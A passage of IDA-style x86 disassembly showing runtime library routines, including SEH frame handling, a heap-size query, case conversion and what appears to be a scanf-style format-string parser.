push edi
call sub_416096
jmp short loc_41B51B
; ---------------------------------------------------------------------------
loc_41B516: ; CODE XREF: sub_41B376+6A�j
; sub_41B376+7C�j ...
call sub_41B672
loc_41B51B: ; CODE XREF: sub_41B376+98�j
; sub_41B376+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_41B51F: ; CODE XREF: sub_41B376+2E�j
; sub_41B376+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41B376 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41B61C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B53A proc near ; CODE XREF: sub_41AE65+170�p
; sub_41B306+3E�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_422880
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41B581
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41B581
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_416096
or [ebp+var_4], 0FFFFFFFFh
loc_41B581: ; CODE XREF: sub_41B53A+2A�j
; sub_41B53A+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41B53A endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41B61C
; =============== S U B R O U T I N E =======================================
sub_41B5A1 proc near ; CODE XREF: sub_41B376+8F�p
; sub_41B376+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_41B5C2
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41B5C2: ; CODE XREF: sub_41B5A1+12�j
pop esi
retn
sub_41B5A1 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B5D0 proc near ; CODE XREF: sub_416129+40�p
; sub_41B111+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_416415
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41B60F
mov ecx, 2
loc_41B60F: ; CODE XREF: sub_41B5D0+38�j
push ecx
call sub_416415
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41B5D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B61C proc near ; CODE XREF: sub_41AE65:loc_41B007�j
; sub_41B1AF:loc_41B1C0�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041EA42 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_422890
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, ds:dword_4C910C
test eax, eax
jz short loc_41B664
mov [ebp+var_4], 1
call eax
jmp short loc_41B660
; ---------------------------------------------------------------------------
loc_41B659: ; DATA XREF: _1:004228A0�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41B65D: ; DATA XREF: _1:004228A4�o
mov esp, [ebp+var_18]
loc_41B660: ; CODE XREF: sub_41B61C+3B�j
and [ebp+var_4], 0
loc_41B664: ; CODE XREF: sub_41B61C+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_41B66D: ; DATA XREF: _1:00422898�o
jmp loc_41EA42
sub_41B61C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B672 proc near ; CODE XREF: sub_4162CB+23�p
; sub_4162CB:loc_416336�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4228A8
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, ds:off_4316E4
test eax, eax
jz short loc_41B6BA
mov [ebp+var_4], 1
call eax ; sub_41B61C
jmp short loc_41B6B6
; ---------------------------------------------------------------------------
loc_41B6AF: ; DATA XREF: _1:004228B8�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41B6B3: ; DATA XREF: _1:004228BC�o
mov esp, [ebp+var_18]
loc_41B6B6: ; CODE XREF: sub_41B672+3B�j
and [ebp+var_4], 0
loc_41B6BA: ; CODE XREF: sub_41B672+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
jmp sub_41B61C
sub_41B672 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B6C8 proc near ; CODE XREF: sub_4167B3+7�p
; sub_4167B3+26�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_4CA708
push esi
cmp eax, 3
jnz short loc_41B6F1
mov esi, [ebp+arg_0]
push esi
call sub_418EA9
test eax, eax
pop ecx
jz short loc_41B6EE
mov eax, [esi-4]
sub eax, 9
jmp short loc_41B726
; ---------------------------------------------------------------------------
loc_41B6EE: ; CODE XREF: sub_41B6C8+1C�j
push esi
jmp short loc_41B718
; ---------------------------------------------------------------------------
loc_41B6F1: ; CODE XREF: sub_41B6C8+E�j
cmp eax, 2
jnz short loc_41B715
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_419C04
add esp, 0Ch
test eax, eax
jz short loc_41B715
movzx eax, byte ptr [eax]
shl eax, 4
jmp short loc_41B726
; ---------------------------------------------------------------------------
loc_41B715: ; CODE XREF: sub_41B6C8+2C�j
; sub_41B6C8+43�j
push [ebp+arg_0]
loc_41B718: ; CODE XREF: sub_41B6C8+27�j
push 0
push ds:dword_4CA704
call ds:dword_4221A8 ; RtlSizeHeap
loc_41B726: ; CODE XREF: sub_41B6C8+24�j
; sub_41B6C8+4B�j
pop esi
leave
retn
sub_41B6C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B729 proc near ; CODE XREF: sub_416878+12B�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4C911C, 0
push ebx
jnz short loc_41B754
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_41B7F2
cmp eax, 7Ah
jg loc_41B7F2
sub eax, 20h
jmp loc_41B7F2
; ---------------------------------------------------------------------------
loc_41B754: ; CODE XREF: sub_41B729+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_41B787
cmp ds:dword_42F56C, 1
jle short loc_41B774
push 2
push ebx
call sub_418762
pop ecx
pop ecx
jmp short loc_41B77F
; ---------------------------------------------------------------------------
loc_41B774: ; CODE XREF: sub_41B729+3D�j
mov eax, ds:off_42F360
mov al, [eax+ebx*2]
and eax, 2
loc_41B77F: ; CODE XREF: sub_41B729+49�j
test eax, eax
jnz short loc_41B787
loc_41B783: ; CODE XREF: sub_41B729+AF�j
mov eax, ebx
jmp short loc_41B7F2
; ---------------------------------------------------------------------------
loc_41B787: ; CODE XREF: sub_41B729+34�j
; sub_41B729+58�j
mov edx, ds:off_42F360
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41B7AA
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_41B7B3
; ---------------------------------------------------------------------------
loc_41B7AA: ; CODE XREF: sub_41B729+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_41B7B3: ; CODE XREF: sub_41B729+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push ds:dword_4C911C
call sub_41C829
add esp, 20h
test eax, eax
jz short loc_41B783
cmp eax, 1
jnz short loc_41B7E5
movzx eax, [ebp+var_4]
jmp short loc_41B7F2
; ---------------------------------------------------------------------------
loc_41B7E5: ; CODE XREF: sub_41B729+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_41B7F2: ; CODE XREF: sub_41B729+14�j
; sub_41B729+1D�j ...
pop ebx
leave
retn
sub_41B729 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7F5 proc near ; CODE XREF: sub_416A97+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_41C1FB
mov edi, [ebp+arg_0]
jmp short loc_41B824
; ---------------------------------------------------------------------------
loc_41B81F: ; CODE XREF: sub_41B7F5+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_41B824: ; CODE XREF: sub_41B7F5+28�j
cmp ds:dword_42F56C, 1
jle short loc_41B83C
movzx eax, al
push 8
push eax
call sub_418762
pop ecx
pop ecx
jmp short loc_41B84B
; ---------------------------------------------------------------------------
loc_41B83C: ; CODE XREF: sub_41B7F5+36�j
mov ecx, ds:off_42F360
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_41B84B: ; CODE XREF: sub_41B7F5+45�j
cmp eax, ebx
jz short loc_41B885
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_41C282
pop ecx
pop ecx
push eax
call sub_41C26B
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41EB21
add esp, 0Ch
loc_41B873: ; CODE XREF: sub_41B7F5+8E�j
test eax, eax
jz short loc_41B885
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41EB21
pop ecx
jmp short loc_41B873
; ---------------------------------------------------------------------------
loc_41B885: ; CODE XREF: sub_41B7F5+58�j
; sub_41B7F5+80�j
cmp byte ptr [esi], 25h
jnz loc_41C167
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_41B8BC: ; CODE XREF: sub_41B7F5+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp ds:dword_42F56C, 1
jle short loc_41B8D9
movzx eax, bl
push 4
push eax
call sub_418762
pop ecx
pop ecx
jmp short loc_41B8E8
; ---------------------------------------------------------------------------
loc_41B8D9: ; CODE XREF: sub_41B7F5+D3�j
mov ecx, ds:off_42F360
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41B8E8: ; CODE XREF: sub_41B7F5+E2�j
test eax, eax
jz short loc_41B8FE
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_41B963
; ---------------------------------------------------------------------------
loc_41B8FE: ; CODE XREF: sub_41B7F5+F5�j
cmp ebx, 4Eh
jg short loc_41B941
jz short loc_41B963
cmp ebx, 2Ah
jz short loc_41B93C
cmp ebx, 46h
jz short loc_41B963
cmp ebx, 49h
jz short loc_41B91E
cmp ebx, 4Ch
jnz short loc_41B950
inc [ebp+var_D]
jmp short loc_41B963
; ---------------------------------------------------------------------------
loc_41B91E: ; CODE XREF: sub_41B7F5+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_41B950
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_41B950
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_41B963
; ---------------------------------------------------------------------------
loc_41B93C: ; CODE XREF: sub_41B7F5+113�j
inc [ebp+var_E]
jmp short loc_41B963
; ---------------------------------------------------------------------------
loc_41B941: ; CODE XREF: sub_41B7F5+10C�j
cmp ebx, 68h
jz short loc_41B95D
cmp ebx, 6Ch
jz short loc_41B955
cmp ebx, 77h
jz short loc_41B958
loc_41B950: ; CODE XREF: sub_41B7F5+122�j
; sub_41B7F5+12D�j ...
inc [ebp+var_F]
jmp short loc_41B963
; ---------------------------------------------------------------------------
loc_41B955: ; CODE XREF: sub_41B7F5+154�j
inc [ebp+var_D]
loc_41B958: ; CODE XREF: sub_41B7F5+159�j
inc [ebp+var_5]
jmp short loc_41B963
; ---------------------------------------------------------------------------
loc_41B95D: ; CODE XREF: sub_41B7F5+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_41B963: ; CODE XREF: sub_41B7F5+107�j
; sub_41B7F5+10E�j ...
cmp [ebp+var_F], 0
jz loc_41B8BC
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_41B988
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_41B988: ; CODE XREF: sub_41B7F5+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_41B9A6
mov al, [esi]
cmp al, 53h
jz short loc_41B9A2
cmp al, 43h
jz short loc_41B9A2
or [ebp+var_5], 0FFh
jmp short loc_41B9A6
; ---------------------------------------------------------------------------
loc_41B9A2: ; CODE XREF: sub_41B7F5+1A1�j
; sub_41B7F5+1A5�j
mov [ebp+var_5], 1
loc_41B9A6: ; CODE XREF: sub_41B7F5+19B�j
; sub_41B7F5+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_41B9DF
cmp esi, 63h
jz short loc_41B9D0
cmp esi, 7Bh
jz short loc_41B9D0
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_41C282
pop ecx
jmp short loc_41B9DB
; ---------------------------------------------------------------------------
loc_41B9D0: ; CODE XREF: sub_41B7F5+1C5�j
; sub_41B7F5+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C251
loc_41B9DB: ; CODE XREF: sub_41B7F5+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_41B9DF: ; CODE XREF: sub_41B7F5+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_41B9EF
cmp [ebp+var_C], eax
jz loc_41C1CB
loc_41B9EF: ; CODE XREF: sub_41B7F5+1EF�j
cmp esi, 6Fh
jg loc_41BC56
jz loc_41BF08
cmp esi, 63h
jz loc_41BC33
cmp esi, 64h
jz loc_41BF08
jle loc_41BC80
cmp esi, 67h
jle short loc_41BA53
cmp esi, 69h
jz short loc_41BA3B
cmp esi, 6Eh
jnz loc_41BC80
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_41C136
jmp loc_41C15C
; ---------------------------------------------------------------------------
loc_41BA3B: ; CODE XREF: sub_41B7F5+229�j
push 64h
pop esi
loc_41BA3E: ; CODE XREF: sub_41B7F5+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_41BCC8
mov [ebp+var_17], 1
jmp loc_41BCCD
; ---------------------------------------------------------------------------
loc_41BA53: ; CODE XREF: sub_41B7F5+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_41BA6F
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_41BA74
; ---------------------------------------------------------------------------
loc_41BA6F: ; CODE XREF: sub_41B7F5+26A�j
cmp ebx, 2Bh
jnz short loc_41BA8B
loc_41BA74: ; CODE XREF: sub_41B7F5+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_41C251
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41BA8E
; ---------------------------------------------------------------------------
loc_41BA8B: ; CODE XREF: sub_41B7F5+27D�j
mov edi, [ebp+arg_0]
loc_41BA8E: ; CODE XREF: sub_41B7F5+294�j
cmp [ebp+var_20], 0
jz short loc_41BA9D
cmp [ebp+var_C], 15Dh
jle short loc_41BAA4
loc_41BA9D: ; CODE XREF: sub_41B7F5+29D�j
mov [ebp+var_C], 15Dh
loc_41BAA4: ; CODE XREF: sub_41B7F5+2A6�j
; sub_41B7F5+2F2�j
cmp ds:dword_42F56C, 1
jle short loc_41BAB9
push 4
push ebx
call sub_418762
pop ecx
pop ecx
jmp short loc_41BAC4
; ---------------------------------------------------------------------------
loc_41BAB9: ; CODE XREF: sub_41B7F5+2B6�j
mov eax, ds:off_42F360
mov al, [eax+ebx*2]
and eax, 4
loc_41BAC4: ; CODE XREF: sub_41B7F5+2C2�j
test eax, eax
jz short loc_41BAE9
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41BAE9
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41C251
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41BAA4
; ---------------------------------------------------------------------------
loc_41BAE9: ; CODE XREF: sub_41B7F5+2D1�j
; sub_41B7F5+2DB�j
cmp ds:byte_42F570, bl
jnz short loc_41BB57
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41BB57
inc [ebp+var_4]
push edi
call sub_41C251
mov ebx, eax
mov al, ds:byte_42F570
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_41BB12: ; CODE XREF: sub_41B7F5+360�j
cmp ds:dword_42F56C, 1
jle short loc_41BB27
push 4
push ebx
call sub_418762
pop ecx
pop ecx
jmp short loc_41BB32
; ---------------------------------------------------------------------------
loc_41BB27: ; CODE XREF: sub_41B7F5+324�j
mov eax, ds:off_42F360
mov al, [eax+ebx*2]
and eax, 4
loc_41BB32: ; CODE XREF: sub_41B7F5+330�j
test eax, eax
jz short loc_41BB57
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41BB57
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41C251
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41BB12
; ---------------------------------------------------------------------------
loc_41BB57: ; CODE XREF: sub_41B7F5+2FA�j
; sub_41B7F5+304�j ...
cmp [ebp+var_1C], 0
jz loc_41BBEF
cmp ebx, 65h
jz short loc_41BB6F
cmp ebx, 45h
jnz loc_41BBEF
loc_41BB6F: ; CODE XREF: sub_41B7F5+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41BBEF
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_41C251
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_41BB96
mov [esi], al
inc esi
jmp short loc_41BB9B
; ---------------------------------------------------------------------------
loc_41BB96: ; CODE XREF: sub_41B7F5+39A�j
cmp ebx, 2Bh
jnz short loc_41BBB9
loc_41BB9B: ; CODE XREF: sub_41B7F5+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_41BBAA
and [ebp+var_C], eax
jmp short loc_41BBB9
; ---------------------------------------------------------------------------
loc_41BBAA: ; CODE XREF: sub_41B7F5+3AE�j
; sub_41B7F5+3F8�j
inc [ebp+var_4]
push edi
call sub_41C251
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41BBB9: ; CODE XREF: sub_41B7F5+3A4�j
; sub_41B7F5+3B3�j
cmp ds:dword_42F56C, 1
jle short loc_41BBCE
push 4
push ebx
call sub_418762
pop ecx
pop ecx
jmp short loc_41BBD9
; ---------------------------------------------------------------------------
loc_41BBCE: ; CODE XREF: sub_41B7F5+3CB�j
mov eax, ds:off_42F360
mov al, [eax+ebx*2]
and eax, 4
loc_41BBD9: ; CODE XREF: sub_41B7F5+3D7�j
test eax, eax
jz short loc_41BBEF
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41BBEF
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_41BBAA
; ---------------------------------------------------------------------------
loc_41BBEF: ; CODE XREF: sub_41B7F5+366�j
; sub_41B7F5+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_41C26B
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_41C1FB
cmp [ebp+var_E], 0
jnz loc_41C15C
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call ds:off_4316C8
add esp, 0Ch
jmp loc_41C15C
; ---------------------------------------------------------------------------
loc_41BC33: ; CODE XREF: sub_41B7F5+20C�j
cmp [ebp+var_20], eax
jnz short loc_41BC42
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_41BC42: ; CODE XREF: sub_41B7F5+441�j
cmp [ebp+var_5], 0
jle short loc_41BC4C
mov [ebp+var_16], 1
loc_41BC4C: ; CODE XREF: sub_41B7F5+451�j
mov edi, offset dword_4316F0
jmp loc_41BD61
; ---------------------------------------------------------------------------
loc_41BC56: ; CODE XREF: sub_41B7F5+1FD�j
mov eax, esi
sub eax, 70h
jz loc_41BF04
sub eax, 3
jz loc_41BD52
dec eax
dec eax
jz loc_41BF08
sub eax, 3
jz loc_41BA3E
sub eax, 3
jz short loc_41BCA4
loc_41BC80: ; CODE XREF: sub_41B7F5+21B�j
; sub_41B7F5+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_41C1CB
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_41C15C
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_41C15C
; ---------------------------------------------------------------------------
loc_41BCA4: ; CODE XREF: sub_41B7F5+489�j
cmp [ebp+var_5], 0
jle short loc_41BCAE
mov [ebp+var_16], 1
loc_41BCAE: ; CODE XREF: sub_41B7F5+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_41BD65
mov eax, edi
lea edi, [eax+1]
jmp loc_41BD61
; ---------------------------------------------------------------------------
loc_41BCC8: ; CODE XREF: sub_41B7F5+24F�j
cmp ebx, 2Bh
jnz short loc_41BCEF
loc_41BCCD: ; CODE XREF: sub_41B7F5+259�j
dec [ebp+var_C]
jnz short loc_41BCDE
cmp [ebp+var_20], 0
jz short loc_41BCDE
mov [ebp+var_F], 1
jmp short loc_41BCEF
; ---------------------------------------------------------------------------
loc_41BCDE: ; CODE XREF: sub_41B7F5+4DB�j
; sub_41B7F5+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C251
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41BCEF: ; CODE XREF: sub_41B7F5+4D6�j
; sub_41B7F5+4E7�j
cmp ebx, 30h
jnz loc_41BF3D
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C251
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_41BD3D
cmp bl, 58h
jz short loc_41BD3D
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_41BD27
push 6Fh
loc_41BD21: ; CODE XREF: sub_41B7F5+55B�j
pop esi
jmp loc_41BF3D
; ---------------------------------------------------------------------------
loc_41BD27: ; CODE XREF: sub_41B7F5+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41C26B
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_41BF3A
; ---------------------------------------------------------------------------
loc_41BD3D: ; CODE XREF: sub_41B7F5+517�j
; sub_41B7F5+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C251
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_41BD21
; ---------------------------------------------------------------------------
loc_41BD52: ; CODE XREF: sub_41B7F5+46F�j
cmp [ebp+var_5], 0
jle short loc_41BD5C
mov [ebp+var_16], 1
loc_41BD5C: ; CODE XREF: sub_41B7F5+561�j
mov edi, offset dword_4316E8
loc_41BD61: ; CODE XREF: sub_41B7F5+45C�j
; sub_41B7F5+4CE�j
or [ebp+var_18], 0FFh
loc_41BD65: ; CODE XREF: sub_41B7F5+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_415500
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_41BD89
cmp byte ptr [edi], 5Dh
jnz short loc_41BD89
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_41BD8C
; ---------------------------------------------------------------------------
loc_41BD89: ; CODE XREF: sub_41B7F5+584�j
; sub_41B7F5+589�j
mov dl, [ebp+var_35]
loc_41BD8C: ; CODE XREF: sub_41B7F5+592�j
; sub_41B7F5+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_41BDF1
inc edi
cmp al, 2Dh
jnz short loc_41BDD8
test dl, dl
jz short loc_41BDD8
mov cl, [edi]
cmp cl, 5Dh
jz short loc_41BDD8
inc edi
cmp dl, cl
jnb short loc_41BDAB
mov al, cl
jmp short loc_41BDAF
; ---------------------------------------------------------------------------
loc_41BDAB: ; CODE XREF: sub_41B7F5+5B0�j
mov al, dl
mov dl, cl
loc_41BDAF: ; CODE XREF: sub_41B7F5+5B4�j
cmp dl, al
ja short loc_41BDD4
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_41BDBC: ; CODE XREF: sub_41B7F5+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_41BDBC
loc_41BDD4: ; CODE XREF: sub_41B7F5+5BC�j
xor dl, dl
jmp short loc_41BD8C
; ---------------------------------------------------------------------------
loc_41BDD8: ; CODE XREF: sub_41B7F5+5A0�j
; sub_41B7F5+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_41BD8C
; ---------------------------------------------------------------------------
loc_41BDF1: ; CODE XREF: sub_41B7F5+59B�j
cmp byte ptr [edi], 0
jz loc_41C1FB
cmp [ebp+var_3C], 7Bh
jnz short loc_41BE03
mov [ebp+arg_4], edi
loc_41BE03: ; CODE XREF: sub_41B7F5+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_41C26B
pop ecx
pop ecx
loc_41BE1A: ; CODE XREF: sub_41B7F5+6BC�j
; sub_41B7F5+6C4�j
cmp [ebp+var_20], 0
jz short loc_41BE2E
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_41BECA
loc_41BE2E: ; CODE XREF: sub_41B7F5+629�j
inc [ebp+var_4]
push edi
call sub_41C251
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_41BEBE
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_41BEBE
cmp [ebp+var_E], 0
jnz short loc_41BEB6
cmp [ebp+var_16], 0
jz short loc_41BEAB
mov ecx, ds:off_42F360
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41BE8A
inc [ebp+var_4]
push edi
call sub_41C251
pop ecx
mov [ebp+var_37], al
